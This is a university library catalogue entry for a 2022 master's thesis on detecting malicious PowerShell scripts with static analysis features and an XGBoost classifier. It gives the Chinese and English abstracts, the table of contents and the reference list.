簡易檢索 / 詳目顯示

研究生: 洪湘嬅
Hsiang-Hua Hung
論文名稱: 機器學習應用於惡意 PowerShell 腳本檢測與特徵組合分析
Machine Learning Approaches to Malicious PowerShell Scripts Detection and Feature Combination Analysis
指導教授: 陳俊良
Jiann-Liang Chen
口試委員: 郭斯彥
Sy-Yen Kuo
黃能富
Nen-Fu Huang
楊竹星
Chu-Sing Yang
陳英一
Ing-Yi Chen
陳俊良
Jiann-Liang Chen
學位類別: 碩士
Master
系所名稱: 電資學院 - 電機工程系
Department of Electrical Engineering
論文出版年: 2022
畢業學年度: 110
語文別: 英文
論文頁數: 59
中文關鍵詞: 機器學習XGBoostPowerShell惡意腳本行為特徵分析
外文關鍵詞: Machine Learning, XGBoost, PowerShell, Malicious Scripts, Behavioral Features Analysis
相關次數: 點閱:247下載:4
分享至:
查詢本校圖書館目錄 查詢臺灣博碩士論文知識加值系統 勘誤回報
  • 隨著通訊技術的進步,現代社會比以往都更依賴網路與各項便於使用者操作 的數位工具,數位化時代為人們的生活及經濟帶來了眾多好處。與此同時,網路 攻擊者使用各種攻擊方式入侵電腦竊取或綁架受害者數據與設備,並從中謀取利 益。面對攻擊者不斷增加且推陳出新的惡意攻擊手段,人們需要開發創新且有效 的防禦技術。
    Windows PowerShell 是 Microsoft 基於.NET 框架的命令列 Shell 與腳本語 言,提供對檔案、行程和 Windows API 的連接和操作,可用於幫助系統管理 員自動化操作系統。其靈活性、強大的結構以及可以直接從命令列執行腳本 的能力成為了許多攻擊者的首選工具。此外攻擊者為躲避防毒軟體的偵測, 經常對 PowerShell 腳本使用各種混淆技術,大幅降低腳本的可讀性。
    本研究以靜態分析的方式檢測 PowerShell 腳本,主要根據腳本的關鍵字、 格式與字串組合判斷其行為意圖,提取了 33 個特徵並分成兩大特徵組合類別, 分別為經計算符合特定現象或事實的 Characteristic-based 特徵與根據關鍵字與指 令判斷其行為意圖的 Behavior-based 特徵。其中 Behavior-based 又可將腳本的行 為區分為具有正向意義的 Positive Behavior-based、具有中立意義的 Neutral Behavior-based 與具有負面意義的 NegativeBehavior-based 三種型態,當中也強 化了三項特徵與引入了一項其他研究應用之特徵。
    透過 XGBoost 模型評估本研究所提出的各項特徵重要性,找出對檢測 PowerShell 腳本具有最大貢獻的特徵組合。最終由綜合型特徵的模型被認為 具有最佳性能,該模型於驗證資料集中可達到 99.27% 的準確率。由數據結 果可知,本研究提出之惡意 PowerShell 腳本檢測模型優於先前的研究。


    With the advancement of communication technology, modern society relies more than ever on the Internet and various user-friendly digital tools. The digital age has brought many benefits to people's lives and economies. At the same time, cyber attackers are using various attack methods to hack into computers to steal or kidnap victims' data and devices and profit from them. In the face of increasing and new malicious attack methods, people must develop innovative and effective defense technologies.
    Windows PowerShell is Microsoft's command-line shell and scripting language based on the .NET Framework. It provides access to and manipulates files, trips, and the Windows API. It can be used to help system administrators automate system operations. Its flexibility, robust structure, and ability to execute scripts directly from the command line have become the tool of choice for many attackers. In addition, attackers often use various obfuscation techniques on PowerShell scripts in order to avoid detection by anti-virus software. It can significantly reduce the readability of the script.
    This study examines PowerShell scripts by static analysis. We extracted 33 features, mainly based on the script's keywords, format, and string combinations, to determine its behavioral intent. One is a characteristic-based feature obtained by calculation; the other is a Behavior-based feature that determines its execution function based on keywords and instructions. Behavior-based can be divided into Positive Behavior-based, Neutral Behavior-based, and Negative Behavior-based. The three features are enhanced, and one other characteristic is introduced for research applications.
    The XGBoost model was used to evaluate the importance of the features proposed in this study and to identify the combination of features that contributed most to the detection of PowerShell scripts. The final model with the combined features is considered to have the best performance. The model achieves 99.27% accuracy in the validation dataset. The data results clearly show that the proposed malicious PowerShell script detection model outperforms the previous studies.

    摘要 I Abstract II List of Figures VII List of Tables VIII Chapter 1 Introduction 1 1.1 Motivation 1 1.2 Contributions 3 1.3 Organization 5 Chapter 2 Related Work 6 2.1 PowerShell Malware Threats 6 2.2 Deobfuscation Techniques 7 2.3 Detection of Malicious PowerShell Scripts 8 Chapter 3 Proposed System 11 3.1 System Architecture 11 3.2 Data Collection 12 3.2.1 Crawler Technology 12 3.2.2 Data Source 13 3.3 Data Preprocessing 14 3.3.1 Data Cleaning 14 3.3.2 Data Integration 14 3.4 Feature Definition 14 3.4.1 Characteristic-based Features 15 3.4.2 Positive Behavior-based Features 18 3.4.3 Neutral Behavior-based Features 19 3.4.4 Negative Behavior-based Features 24 3.5 Detection Model Architecture 28 Chapter 4 Performance Analysis 30 4.1 System Environment and Parameter Settings 30 4.2 Performance Evaluation Metrics 32 4.3 Performance Analysis 34 4.3.1 Feature Analysis of Characteristic-based 34 4.3.2 Feature Analysis of Positive Behavior-based 35 4.3.3 Feature Analysis of Neutral Behavior-based 37 4.3.4 Feature Analysis of Negative Behavior-based 38 4.3.5 Feature Analysis of All Features 39 4.4 Comparison of Different Study 40 4.5 Summary 41 Chapter 5 Conclusions and Future Works 43 5.1 Conclusions 43 5.2 Future Works 43 References 45

    [1] S. Wheeler, hananyajacobson, and shawnkoon, "What is PowerShell?," Retrieved from https://docs.microsoft.com/en-us/powershell/scripting/ (last visited on 2022/06/30)
    [2] D. Bohannon, "Invoke-Obfuscation," Retrieved from https://github.com/danielbohannon/Invoke-Obfuscation/ (last visited on 2022/06/30)
    [3] C. Wueest, and D. Stephen, "The increased use of powershell in attacks," Proc. CA, Symantec Corporation World Headquarters, pp. 1-18, 2016
    [4] D. Patten, “The evolution to fileless malware,” Retrieved from http://infosecwriters.com/Papers/DPatten_Fileless.pdf (last visited on 2022/06/30)
    [5] VMware Carbon Black, "‘PowerShell’ Deep Dive: A United Threat Research Report," Retrieved from https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-powershell-deep-dive.pdf (last visited on 2022/06/30)
    [6] Trend Micro, "Microsoft Detection Tools Sniff Out Fileless Malware," Retrieved from https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/microsoft-detection-tools-sniff-out-fileless-malware/ (last visited on 2022/06/30)
    [7] Cisco Security Outcomes Study, "Proven Success Factors for Endpoint Security," Retrieved from https://www.cisco.com/c/dam/en/us/products/collateral/security/2021-outcomes-study-for-endpoint.pdf (last visited on 2022/06/30)
    [8] C. Beek et al., "McAfee Labs Threats Report-November 2020," McAfee Labs, 2020.
    [9] C. Beek, J. Fokker, D. McKee and S. Povolny, "Trellix Advanced Threat Research Report: January 2022," McAfee Labs, 2022.
    [10] J. White, "Practical Behavioral Profiling of PowerShell Scripts through Static Analysis (Part 1)," Retrieved from https://unit42.paloaltonetworks.com/practical-behavioral-profiling-of-powershell-scripts-through-static-analysis-part-1/ (last visited on 2022/06/30)
    [11] J. White, "Practical Behavioral Profiling of PowerShell Scripts through Static Analysis (Part 2)," Retrieved from https://unit42.paloaltonetworks.com/practical-behavioral-profiling-of-powershell-scripts-through-static-analysis-part-2/ (last visited on 2022/06/30)
    [12] J. White, "Practical Behavioral Profiling of PowerShell Scripts through Static Analysis (Part 3)," Retrieved from https://unit42.paloaltonetworks.com/practical-behavioral-profiling-of-powershell-scripts-through-static-analysis-part-3/ (last visited on 2022/06/30)
    [13] S. Kumar, "An emerging threat Fileless malware: a survey and research challenges," Cybersecurity, vol. 3, no. 1, pp. 1-12, 2020.
    [14] A. Afreen, M. Aslam, and S. Ahmed, "Analysis of fileless malware and its evasive behavior," 2020 International Conference on Cyber Warfare and Security (ICCWS), pp. 1-8, 2020.
    [15] H. YÜCEEL and Picus Labs, "T1059 Command and Scripting Interpreter of the MITRE ATT&CK Framework," Retrieved from https://www.picussecurity.com/resource/t1059-command-and-scripting-interpreter-of-the-mitre-attck-framework/ (last visited on 2022/06/30)
    [16] J. White, "Pulling Back the Curtains on EncodedCommand PowerShell Attacks," Retrieved from https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/ (last visited on 2022/06/30)
    [17] karttoon, "psencmds," Retrieved from https://github.com/pan-unit42/iocs/tree/master/psencmds/ (last visited on 2022/06/30)
    [18] C. Liu et al., "PSDEM: a feasible de-obfuscation method for malicious PowerShell detection," 2018 IEEE Symposium on Computers and Communications (ISCC), pp. 825-831, 2018.
    [19] D. Ugarte et al., "PowerDrive: accurate de-obfuscation and analysis of PowerShell malware," International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, pp. 240-259, 2019.
    [20] D. Hendler, S. Kels, and A. Rubin, "Detecting malicious powershell commands using deep neural networks," Proceedings of the 2018 on Asia conference on computer and communications security, pp. 187-197, 2018.
    [21] G. Rusak, A. Al-Dujaili and U. M. O'Reilly, "Ast-based deep learning for detecting malicious powershell," Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security, pp. 2276-2278, 2018.
    [22] Z. Li et al., "Effective and light-weight deobfuscation and semantic-aware attack detection for powershell scripts," Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security, pp. 1831-1847, 2019.
    [23] Y. Tajiri, and M. Mimura, "Detection of malicious powershell using word-level language models," International Workshop on Security, pp. 39-56, 2020.
    [24] Y. Fang, X. Zhou, and C. Huang, "Effective method for detecting malicious PowerShell scripts based on hybrid features," Neurocomputing, vol. 448, pp. 30-39, 2021.
    [25] J. Song et al., "Evaluations of AI‐based malicious PowerShell detection with feature optimizations," ETRI Journal, vol. 43, no. 3, pp. 549-560, 2021.
    [26] S. Choi, "Malicious powershell detection using graph convolution network," Applied Sciences, vol. 11, no. 14, pp. 6429, 2021.
    [27] A. Alahmadi, N. Alkhraan, and W. BinSaeedan, "MPSAutodetect: A Malicious Powershell Script Detection Model Based on Stacked Denoising Auto-Encoder," Computers & Security, vol. 116, pp. 102658, 2022.
    [28] karttoon. "PowerShellProfiler," Retrieved from https://github.com/pan-unit42/public_tools/tree/master/powershellprofiler/ (last visited on 2022/06/30)
    [29] Y. Choi et al., "Automatic detection for javascript obfuscation attacks in web pages through string pattern analysis," International Conference on Future Generation Information Technology, pp. 160-172, 2009.
    [30] T. Chen, and C. Guestrin, "Xgboost: A scalable tree boosting system," Proceedings of the 22nd acm sigkdd international conference on knowledge discovery and data mining, pp. 785-794, 2016.

    QR CODE